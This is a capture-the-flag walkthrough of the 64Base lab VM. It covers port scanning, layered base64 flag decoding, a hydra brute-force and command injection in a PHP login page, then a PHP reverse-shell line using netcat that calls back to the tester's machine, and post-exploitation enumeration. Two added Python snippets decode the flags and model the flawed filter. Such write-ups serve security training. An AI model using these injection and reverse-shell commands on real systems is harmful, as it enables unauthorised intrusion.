64Base: 1.0.1 walkthrough - DigiP

Apr 8th, 2017
  3. netdiscover
  4.  
  5. 192.168.1.76 08:00:27:17:c2:d5 6 360 PCS Systemtechnik GmbH
  6.  
  7.  
  8. nmap -sC -sV -T5 -Pn -p- -A --open 192.168.1.76
  9.  
  10. PORT STATE SERVICE VERSION
  11. 22/tcp open ssh?
  12. | fingerprint-strings:
  13. | GenericLines, NULL:
  14. | The programs included with the Fedora GNU/Linux system are free software;
  15. | exact distribution terms for each program are described in the
  16. | individual files in /usr/share/doc/*/copyright.
  17. | Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  18. | permitted by applicable law.
  19. |_ Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
  20. 80/tcp open http Apache httpd 2.4.10 ((Debian))
  21. | http-robots.txt: 429 disallowed entries (15 shown)
  22. | /administrator/ /admin/ /login/ /88888/ /88888888/
  23. | /88888888888/ /88888888888P/ /c3P08P/ /C3p0/ /A280/ /above/ /AC1/
  24. |_/across/ /activation/ /Adjustments/
  25. |_http-server-header: Apache/2.4.10 (Debian)
  26. |_http-title: 64base
  27. 62964/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
  28. | ssh-hostkey:
  29. | 1024 59:a5:02:ba:72:8a:2e:c1:9c:ff:cc:b2:f8:15:66:b3 (DSA)
  30. | 2048 2a:57:2c:75:8c:34:9f:28:84:15:07:2a:be:d0:41:98 (RSA)
  31. |_ 256 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91 (ECDSA)
  32. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  49. MAC Address: 08:00:27:17:C2:D5 (Oracle VirtualBox virtual NIC)
  50. Device type: general purpose
  51. Running: Linux 2.4.X
  52. OS CPE: cpe:/o:linux:linux_kernel:2.4.21
  53. OS details: Linux 2.4.21
  54. Network Distance: 1 hop
  55. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  56.  
  57. Viewing the source of the home page, we notice a base64 string:
  58.  
  59. <span class="subheading">dmlldyBzb3VyY2UgO0QK</span>
  60. <!--5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-->
  61.  
  62. We also see a hexadecimal string in the HTML comment above.
  63.  
  64. We hex-decode it and get another base64 string:
  65. echo 5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a | xxd -r -p
  66. ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==
  67.  
  68. root@kali:~/ctf/x64# echo -e ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg== | base64 -d
  69. flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
  70.  
  71. 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
  72.  
  73. We do some directory fuzzing using the entries in robots.txt and find a login prompt for /admin. After some time, we realize this is a dead end (for now). However, after scraping the site text for keywords, we find a new directory with a login prompt, /Imperial-Class/, which is one letter different from the entry in our robots.txt file.
  74.  
  75. We take the info we were given in flag 1, add it to the robots.txt word list, and run hydra:
  76.  
  77. hydra -L /root/ctf/x64/robots.txt -P /root/ctf/x64/robots.txt -u -s 80 -m '/Imperial-Class' 192.168.1.76 http-get -v -T16
  78. Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  79.  
  80. Hydra (http://www.thc.org/thc-hydra) starting at 2017-04-08 08:02:26
  81. [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
  82. [DATA] max 16 tasks per 1 server, overall 16 tasks, 188356 login tries (l:434/p:434), ~735 tries per task
  83. [DATA] attacking service http-get on port 80
  84. [VERBOSE] Resolving addresses ... [VERBOSE] resolving done
  85. [80][http-get] host: 192.168.1.76 login: 64base password: Th353@r3N0TdaDr01DzU@reL00K1ing4
  86.  
  87. We see the following: [☠] ERROR: incorrect path!.... TO THE DARK SIDE!
  88.  
  89. Viewing the source, we find:
  90. <title>64base - login</title>
  91. <h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
  92. <!-- don't forget the BountyHunter login -->
  93.  
  94. We add this to the URL, and get a new login page:
  95. http://192.168.1.76/Imperial-Class/BountyHunter/
  96.  
  97. Viewing the source, we see that it posts to ./login.php.
  98. If we navigate to this page and view the source, we get a new clue:
  99.  
  100. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/index.php
  101.  
  102.  
  103. <body bgcolor=#000000><font color=#cfbf00>
  104. <form name="login-form" id="login-form" method="post" action="./login.php">
  105. <fieldset>
  106. <legend>Please login:</legend>
  107. <dl>
  108. <dt>
  109. <label title="Username">Username:
  110. <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" />
  111. </label>
  112. </dt>
  113. </dl>
  114. <dl>
  115. <dt>
  116. <label title="Password">Password:
  117. <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" />
  118. </label>
  119. </dt>
  120. </dl>
  121. <dl>
  122. <dt>
  123. <label title="Submit">
  124. <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" />
  125. <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
  126. </label>
  127. </dt>
  128. </dl>
  129. </fieldset>
  130. </form>
  131.  
  132.  
  133. We decode it and get another base64 string:
  134. root@kali:~/ctf/x64# echo -e 52714d544a54626d51315a45566157464655614446525557383966516f3d0a | xxd -r -p
  135. RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=
  136.  
  137. This appears to be invalid data, possibly another false flag. However, if we combine the form's id values with the token, we get:
  138.  
  139. ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=
  140.  
  141. This gives us Flag 2
  142. echo ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo= | base64 -d
  143. flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
  144.  
  145. echo aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo= | base64 -d
  146. https://www.youtube.com/watch?v=vJwytFWA8uA
  147.  
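The fragment reassembly above as a runnable check, added here as an example and not part of the original paste: it peels hex, base64 and flagN{...} layers, and shows why the basictoken alone fails to decode while the two id values plus the token decode cleanly. The function names are this example's own; the three hex strings are copied from the form source above.

```python
import base64
import binascii
import re

# Hex strings copied from the BountyHunter form on this page, in document order.
USERNAME_ID = "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756"
PASSWORD_ID = "584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32"
BASICTOKEN = "52714d544a54626d51315a45566157464655614446525557383966516f3d0a"

FLAG_RE = re.compile(r"^(flag\d+)\{(.+)\}$")
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _as_text(raw):
    """Return stripped printable ASCII, or None if the bytes are not text."""
    try:
        text = raw.decode("ascii").strip()
    except UnicodeDecodeError:
        return None
    if text and all(32 <= ord(ch) < 127 for ch in text):
        return text
    return None


def _decode_once(value):
    """Remove one layer: a flagN{...} wrapper, then hex, then base64.

    This is a heuristic: a layer only counts if it decodes to printable text.
    """
    match = FLAG_RE.match(value)
    if match:
        return match.group(1), match.group(2)
    if HEX_RE.match(value):
        text = _as_text(binascii.unhexlify(value))
        if text is not None:
            return "hex", text
    # Base64 is a whole number of 4-character quanta. A fragment cut out of
    # the middle of a longer string (the basictoken on its own) fails here.
    if len(value) % 4 == 0 and B64_RE.match(value):
        try:
            text = _as_text(base64.b64decode(value, validate=True))
        except binascii.Error:
            text = None
        if text is not None:
            return "base64", text
    return None


def peel(value, max_layers=8):
    """Return [(layer_kind, decoded_text), ...] until nothing more decodes."""
    layers = []
    current = value.strip()
    for _ in range(max_layers):
        step = _decode_once(current)
        if step is None:
            break
        layers.append(step)
        current = step[1]
    return layers


if __name__ == "__main__":
    print("token alone:")
    for kind, text in peel(BASICTOKEN):
        print("  %-7s %s" % (kind, text))
    print("id + id + token:")
    for kind, text in peel(USERNAME_ID + PASSWORD_ID + BASICTOKEN):
        print("  %-7s %s" % (kind, text))
```
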
  148. http://192.168.1.76/Imperial-Class/BountyHunter/
  149.  
  150. NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0
  151. 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
  152.  
  153. Maybe we're not seeing everything
  154.  
  155. curl -v -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.1.76/Imperial-Class/BountyHunter/login.php
  156. * Trying 192.168.1.76...
  157. * TCP_NODELAY set
  158. * Connected to 192.168.1.76 (192.168.1.76) port 80 (#0)
  159. * Server auth using Basic with user '64base'
  160. > GET /Imperial-Class/BountyHunter/login.php HTTP/1.1
  161. > Host: 192.168.1.76
  162. > Authorization: Basic NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0
  163. > User-Agent: curl/7.52.1
  164. > Accept: */*
  165. >
  166. < HTTP/1.1 302 Moved Temporarily
  167. < Date: Sat, 08 Apr 2017 13:25:37 GMT
  168. < Server: Apache/2.4.10 (Debian)
  169. < Location: /Imperial-Class/BountyHunter/index.php
  170. < Transfer-Encoding: chunked
  171. < Content-Type: text/html; charset=UTF-8
  172. <
  173.  
  174. flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
  175. * Curl_http_done: called premature == 0
  176. * Connection #0 to host 192.168.1.76 left intact
  177.  
  178. NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=
  179. http://192.168.1.76/
  180. 53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
  181.  
  182. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/login.php?f=system&c=pwd
  183. <body bgcolor=#000000><font color=#cfbf00> <h2>[64base Command Shell]</h2> <pre>
  184. <h4>flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}</h4>
  185. Debian GNU/Linux 8 \n \l
  186.  
  187. Sat Apr 8 14:32:46 BST 2017
  188. Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
  189. inet addr:192.168.1.76 Bcast:192.168.1.255 Mask:255.255.255.0
  190. inet6 addr: fe80::a00:27ff:fe17:c2d5/64 Scope:Link
  191.  
  192. <body bgcolor=#000000><font color=#cfbf00> <h2>[64base Command Shell]</h2> <pre>
  193. <h4>flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}</h4>
  194.  
  195. echo NjRiYXNlOjY0YmFzZTVoMzc3Cg== | base64 -d
  196. 64base:64base5h377
  197.  
  198. Playing with login.php, it looks like we can execute commands on the system, but much is filtered out. However, if we pay attention, we have two user contexts here.
  199.  
  200. User 64base:
  201. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/login.php?f=system&c=id
  202. uid=1001(64base) gid=1001(64base) groups=1001(64base)
  203.  
  204. User www-data:
  205. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/login.php?f=system&c=test||id
  206. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  207.  
  208. We run various commands as www-data:
  209.  
  210. Debian GNU/Linux 8 \n \l
  211.  
  212. Sat Apr 8 14:35:17 BST 2017
  213. Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
  214. inet addr:192.168.1.76 Bcast:192.168.1.255 Mask:255.255.255.0
  215. inet6 addr: fe80::a00:27ff:fe17:c2d5/64 Scope:Link
  216.  
  217. total 44K
  218. 4.0K drwxr-xr-x 5 www-data www-data 4.0K Dec 5 23:42 .
  219. 4.0K drwxr-xr-x 3 www-data www-data 4.0K Dec 6 02:00 ..
  220. 4.0K -rwxr-x--- 1 www-data www-data 2.1K Dec 5 23:42 cat
  221. 4.0K drwxr-xr-x 2 www-data www-data 4.0K Dec 5 23:42 css
  222. 4.0K -rwxr-x--- 1 www-data www-data 757 Dec 6 02:02 index.html
  223. 4.0K -rwxr-x--- 1 www-data www-data 705 Dec 5 23:42 index.jade
  224. 4.0K -rwxr-x--- 1 www-data www-data 959 Dec 6 02:13 index.php
  225. 4.0K drwxr-xr-x 2 www-data www-data 4.0K Dec 5 23:42 js
  226. 4.0K -rwxr-x--- 1 www-data www-data 1.1K Dec 5 23:42 license.txt
  227. 4.0K -rwxr-x--- 1 www-data www-data 835 Dec 6 02:20 login.php
  228. 4.0K drwxr-xr-x 2 www-data www-data 4.0K Dec 5 23:42 scss
  229.  
  230. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/cat
  231.  
  232. #!/bin/bash
  233. echo '''
  234. ▄ ▄██▄
  235. ▐██▄ ▄█░░█▌
  236. ▐█░██▄ ██░░░█▌
  237. ▐█░░░██ ██░░░░█
  238. █░░░░██▄████████▄███░░░█
  239. ██░░█░░░░░░░░░░░░░░░█░██
  240. ███░░░░░░░░░░░░░░░░░██
  241. ██░░░░░░░░░░░░░░░░░░░█
  242. ▐█░░░░░░▄▄█░░█▄▄░░░░░░█▌
  243. ▐█░░░██████░░██████░░░█▌
  244. ██░░███████░░███████░░██
  245. ██░░█▄▐█▌▐█░░█▌▐█▌▄█░░██
  246. ██░░██▄▄▄██░░██▄▄▄██░░██▌
  247. ▐█▌░░▀█████▀░░▀█████▀░░▐█▌
  248. ▐█▌░░░░▀█▀░░░░░░▀█▀░░░░▐█▌
  249. ██░░░░░░░░░▀▄▄▀░░░░░░░░░██
  250. ██░░░░░░░▀▄░▐▌░▄▀░░░░░░░██
  251. █▌░░░░░░░░░▀▀▀▀░░░░░░░░░▐█
  252. ██░░░░░░░░░░░░░░░░░░░░░░░▐█▌
  253. ██░░░░░░░░░░░░░░░░░░░░░░░░░██
  254. █▌░░░░░░░░░░░░░░░░░░░░░░░░░▐█
  255.  
  256. Is this the cat you were looking for?
  257.  
  258. netstat -antplu
  259.  
  260. Active Internet connections (servers and established)
  261. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  262. tcp 0 0 0.0.0.0:62964 0.0.0.0:* LISTEN -
  263. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  264. tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
  265. tcp 0 0 0.0.0.0:4899 0.0.0.0:* LISTEN -
  266. tcp6 0 0 :::62964 :::* LISTEN -
  267. tcp6 0 0 ::1:25 :::* LISTEN -
  268. tcp6 0 0 :::80 :::* LISTEN -
  269. tcp6 0 0 192.168.1.76:80 192.168.1.66:37592 TIME_WAIT -
  270. tcp6 0 0 192.168.1.76:80 192.168.1.66:37942 ESTABLISHED -
  271. udp 0 0 0.0.0.0:47415 0.0.0.0:* -
  272. udp 0 0 0.0.0.0:68 0.0.0.0:* -
  273. udp6 0 0 :::18884 :::* -
  274.  
  275. Interesting UDP port. Didn't bother with it.
  276.  
  277.  
  278. ps aux
  279. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  280. root 1 0.0 0.5 5376 3968 ? Ss 09:54 0:01 /sbin/init
  281. root 2 0.0 0.0 0 0 ? S 09:54 0:00 [kthreadd]
  282. root 3 0.4 0.0 0 0 ? S 09:54 1:15 [ksoftirqd/0]
  283. root 5 0.0 0.0 0 0 ? S< 09:54 0:00 [kworker/0:0H]
  284. root 6 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/u2:0]
  285. root 7 0.0 0.0 0 0 ? S 09:54 0:01 [watchdog/0]
  286. root 8 0.0 0.0 0 0 ? S< 09:54 0:00 [khelper]
  287. root 9 0.0 0.0 0 0 ? S 09:54 0:00 [kdevtmpfs]
  288. root 10 0.0 0.0 0 0 ? S< 09:54 0:00 [netns]
  289. root 11 0.0 0.0 0 0 ? S 09:54 0:00 [khungtaskd]
  290. root 12 0.0 0.0 0 0 ? S< 09:54 0:00 [writeback]
  291. root 13 0.0 0.0 0 0 ? SN 09:54 0:00 [ksmd]
  292. root 14 0.0 0.0 0 0 ? S< 09:54 0:00 [crypto]
  293. root 15 0.0 0.0 0 0 ? S< 09:54 0:00 [kintegrityd]
  294. root 16 0.0 0.0 0 0 ? S< 09:54 0:00 [bioset]
  295. root 17 0.0 0.0 0 0 ? S< 09:54 0:00 [kblockd]
  296. root 18 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/0:1]
  297. root 19 0.0 0.0 0 0 ? S 09:54 0:00 [kswapd0]
  298. root 20 0.0 0.0 0 0 ? S 09:54 0:00 [fsnotify_mark]
  299. root 26 0.0 0.0 0 0 ? S< 09:54 0:00 [kthrotld]
  300. root 27 0.0 0.0 0 0 ? S< 09:54 0:00 [ipv6_addrconf]
  301. root 28 0.0 0.0 0 0 ? S< 09:54 0:00 [deferwq]
  302. root 62 0.0 0.0 0 0 ? S 09:54 0:00 [khubd]
  303. root 63 0.0 0.0 0 0 ? S< 09:54 0:00 [ata_sff]
  304. root 65 0.0 0.0 0 0 ? S< 09:54 0:00 [kpsmoused]
  305. root 67 0.0 0.0 0 0 ? S 09:54 0:00 [scsi_eh_0]
  306. root 68 0.0 0.0 0 0 ? S< 09:54 0:00 [scsi_tmf_0]
  307. root 69 0.0 0.0 0 0 ? S 09:54 0:00 [scsi_eh_1]
  308. root 70 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/u2:2]
  309. root 71 0.0 0.0 0 0 ? S< 09:54 0:00 [scsi_tmf_1]
  310. root 72 0.0 0.0 0 0 ? S 09:54 0:00 [scsi_eh_2]
  311. root 73 0.0 0.0 0 0 ? S< 09:54 0:00 [scsi_tmf_2]
  312. root 78 0.0 0.0 0 0 ? S< 09:54 0:00 [kworker/0:1H]
  313. root 98 0.0 0.0 0 0 ? S 09:54 0:00 [jbd2/sda1-8]
  314. root 99 0.0 0.0 0 0 ? S< 09:54 0:00 [ext4-rsv-conver]
  315. root 131 0.0 0.0 0 0 ? S 09:54 0:00 [kauditd]
  316. root 133 0.0 0.4 8284 3776 ? Ss 09:54 0:01 /lib/systemd/systemd-journald
  317. root 143 0.0 0.3 12268 3056 ? Ss 09:54 0:00 /lib/systemd/systemd-udevd
  318. root 350 0.0 0.6 8108 5024 ? Ss 09:54 0:00 /usr/sbin/sshd -D
  319. root 351 0.0 0.3 5012 2844 ? Ss 09:54 0:00 /usr/sbin/cron -f
  320. daemon 352 0.0 0.2 2648 1900 ? Ss 09:54 0:00 /usr/sbin/atd -f
  321. root 356 0.0 0.3 3528 2456 ? Ss 09:54 0:00 /lib/systemd/systemd-logind
  322. message+ 360 0.0 0.4 5244 3296 ? Ss 09:54 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  323. root 400 0.0 0.4 31096 3576 ? Ssl 09:54 0:00 /usr/sbin/rsyslogd -n
  324. root 402 0.0 0.2 2196 1608 ? Ss 09:54 0:00 /usr/sbin/acpid
  325. root 411 0.0 0.2 4176 2044 tty1 Ss+ 09:54 0:00 /sbin/agetty --noclear tty1 linux
  326. root 641 0.0 2.6 107180 20132 ? Ss 09:54 0:02 php-fpm: master process (/etc/php5/fpm/php-fpm.conf)
  327. Debian-+ 654 0.0 0.3 9940 3008 ? Ss 09:54 0:00 /usr/sbin/exim4 -bd -q30m
  328. root 656 0.0 0.5 6280 4592 ? Ss 09:54 0:03 /usr/sbin/apache2 -k start
  329. www-data 658 0.0 1.3 107316 10740 ? S 09:54 0:00 php-fpm: pool www
  330. www-data 659 0.0 1.3 107316 10612 ? S 09:54 0:00 php-fpm: pool www
  331. www-data 661 0.0 0.4 6048 3196 ? S 09:54 0:00 /usr/sbin/fcgi-pm -k start
  332. www-data 662 2.5 0.9 231184 7216 ? Sl 09:54 7:57 /usr/sbin/apache2 -k start
  333. root 761 0.0 0.8 9248 6712 ? Ss 09:54 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
  334. root 1025 0.0 0.0 0 0 ? S 10:09 0:06 [kworker/0:0]
  335. www-data 1315 2.9 0.9 231192 7032 ? Sl 10:33 7:54 /usr/sbin/apache2 -k start
  336. www-data 1511 2.9 0.9 231184 6984 ? Sl 10:33 7:50 /usr/sbin/apache2 -k start
  337. root 5339 0.0 0.2 2224 1600 ? S 15:03 0:00 /bin/nc.real -knlp 4899
  338. root 5340 0.0 0.1 2224 1480 ? S 15:03 0:00 /bin/nc.real -knlp 22
  339. www-data 5341 0.0 0.1 2272 1524 ? S 15:03 0:00 sh -c echo '
  340. flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
  341.  
  342. ';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base ps aux
  343. root 5347 0.0 0.3 4260 2888 ? S 15:03 0:00 sudo -u 64base ps aux
  344. 64base 5348 0.0 0.2 3172 1988 ? R 15:03 0:00 ps aux
  345.  
  346.  
  347.  
  348. cat login.php
  349.  
  350.  
  351. <?php
  352. function clean($t)
  353. {
  354. $t = preg_replace('/[^A-Za-z0-9\-|. ]/', '', $t);
  355. return $t;
  356. }
  357. if(isset($_REQUEST['f']) && isset($_REQUEST['c']))
  358. {
  359. $_c = clean($_REQUEST['c']);
  360. $_s = preg_replace( "/\r|\n/", "", 'sudo -u 64base '.$_c);
  361. echo base64_decode('PGJvZHkgYmdjb2xvcj0jMDAwMDAwPjxmb250IGNvbG9yPSNjZmJmMDA+IDxoMj5bNjRiYXNlIENvbW1hbmQgU2hlbGxdPC9oMj4gPHByZT4K');
  362. $_u = base64_decode('ZWNobyAnPGg0PmZsYWc0e05qUmlZWE5sT2pZMFltRnpaVFZvTXpjM0NnPT19PC9oND4nO2NhdC5yZWFsIC9ldGMvaXNzdWU7ZGF0ZTt1bmFtZSAtYTsvc2Jpbi9pZmNvbmZpZyBldGgwfC91c3Ivc2hhcmUvZ3JlcC5yZWFsIGluZXQ7ZWNobwo=').' '.$_s;
  363. $_REQUEST['f']($_u);
  364. die;
  365. }
  366. header('Location: /Imperial-Class/BountyHunter/index.php');
  367. ?>
  368.  
  369. flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
  370.  
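A model of the filter in login.php, added here as an example and not code from the paste or the VM: it reproduces clean() in Python, shows that the pipe character survives it so the sudo -u 64base prefix covers only the first command (the two user contexts seen earlier), and sets a fixed-argv allowlist beside it as the hardened form. The allowlist contents and all function names are assumptions of this example.

```python
import re

# Same character class as clean() in the login.php listing above.
PHP_CLEAN = re.compile(r"[^A-Za-z0-9\-|. ]")
SUDO_PREFIX = "sudo -u 64base "


def clean(c):
    """Python equivalent of clean($t): drop every character not allowed."""
    return PHP_CLEAN.sub("", c)


def build_s(c):
    """Model of $_s: sudo prefix + filtered input, with CR/LF removed."""
    return re.sub(r"\r|\n", "", SUDO_PREFIX + clean(c))


def surviving_metachars(candidates=";&|$`<>()'\"\\\n"):
    """Which shell metacharacters pass through clean() unchanged."""
    return [ch for ch in candidates if clean(ch) == ch]


def audit(c):
    """List each simple command in $_s and whether the sudo prefix covers it.

    After clean() no quotes or backslashes remain, so splitting on | and ||
    matches how the shell separates the commands. The prefix is plain text at
    the start of the line, so only the first command runs through sudo.
    """
    stages = [s.strip() for s in re.split(r"\|\|?", build_s(c))]
    return [(s, i == 0) for i, s in enumerate(stages) if s]


# Hardened form (assumption of this example): the request names a command,
# the server maps it to a fixed argv and executes it without a shell. The
# paths come from the sudo -l output on this page; restricting the list to
# read-only status commands is this example's choice. The caller-supplied
# function name (the f parameter) is not used at all.
ALLOWED = {
    "id": ["/usr/bin/id"],
    "whoami": ["/usr/bin/whoami"],
    "who": ["/usr/bin/who"],
    "w": ["/usr/bin/w"],
}


def hardened_argv(c):
    """Return the argv list to execute, or raise ValueError."""
    if c not in ALLOWED:
        raise ValueError("command not allowed: %r" % c)
    return ["sudo", "-u", "64base", "--"] + ALLOWED[c]


if __name__ == "__main__":
    print("metacharacters that survive clean():", surviving_metachars())
    for sample in ("id", "test||id"):  # both inputs appear on this page
        print(sample, "->", audit(sample))
        try:
            print("  hardened:", hardened_argv(sample))
        except ValueError as err:
            print("  hardened: rejected,", err)
```
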
  371.  
  372.  
  373.  
  374. We start a local web server and put a redirect to a payload we want to run on the target system. Then we execute wget on the remote system to download our payload. In this payload, we copy /bin/nc.real to /var/www/html/Imperial-Class/BountyHunter/shit.
  375. shit will be our nc to play with. We create another local payload to run on the remote system. This time, we start a listener locally and wait for a reverse shell from the target system with the following:
  376. <?php system('/var/www/html/Imperial-Class/BountyHunter/shit -nv 192.168.1.66 444 -e /bin/bash'); ?>
  377.  
  378. This gives us remote access to traverse the system.
  379.  
  380. We issue sudo -l:
  381. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  382. sudo -l
  383. Matching Defaults entries for www-data on 64base:
  384. env_reset, mail_badpass,
  385. secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  386.  
  387. User www-data may run the following commands on 64base:
  388. (64base : 64base) NOPASSWD: /usr/bin/id, /bin/ls, /bin/netstat,
  389. /usr/bin/who, /usr/bin/whoami, /usr/bin/wget, /bin/ping, /bin/cat,
  390. /bin/nc, /usr/bin/w, /usr/bin/base64, /bin/ps, /usr/bin/locate
  391.  
  392. We see a number of commands that www-data can run as 64base without a password.
  393.  
  394. root:x:0:0:root:/root:/bin/bash
  395. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  396. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  397. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  398. sync:x:4:65534:sync:/bin:/bin/sync
  399. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  400. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  401. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  402. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  403. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  404. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  405. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  406. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  407. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  408. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  409. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  410. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  411. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  412. systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
  413. systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
  414. systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
  415. systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
  416. Debian-exim:x:104:109::/var/spool/exim4:/bin/false
  417. messagebus:x:105:110::/var/run/dbus:/bin/false
  418. statd:x:106:65534::/var/lib/nfs:/bin/false
  419. sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
  420. 64base:x:1001:1001::/64base:/bin/rbash
  421.  
  422. We discover why our 64base user's commands are filtered: we were in an rbash shell.
  423.  
  424. env
  425. USER=www-data
  426. PWD=/home
  427. HOME=/var/www
  428. SHLVL=2
  429. _=/usr/bin/env
  430. OLDPWD=/var/www
  431.  
  432. echo $SHELL
  433. /usr/sbin/nologin
  434. echo $PATH
  435. /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  436.  
  437. Let's get a TTY shell:
  438. python -c 'import pty; pty.spawn("/bin/bash")'
  439.  
  440. www-data@64base:~/html$ find -user root
  441. find -user root
  442. ./admin/S3cR37
  443. ./admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
  444.  
  445.  
  446.  
  447.  
  448. www-data@64base:~/html$ cd admin
  449. cd admin
  450.  
  451. www-data@64base:~/html/admin$ ls -lash
  452. ls -lash
  453. total 28K
  454. 4.0K drwxr-xr-x 3 www-data www-data 4.0K Dec 6 03:00 .
  455. 12K drwxr-xr-x 431 www-data www-data 12K Dec 6 02:41 ..
  456. 4.0K -rw-r--r-- 1 www-data www-data 113 Dec 6 02:25 .htaccess
  457. 4.0K drwxr-xr-x 2 root root 4.0K Dec 6 03:00 S3cR37
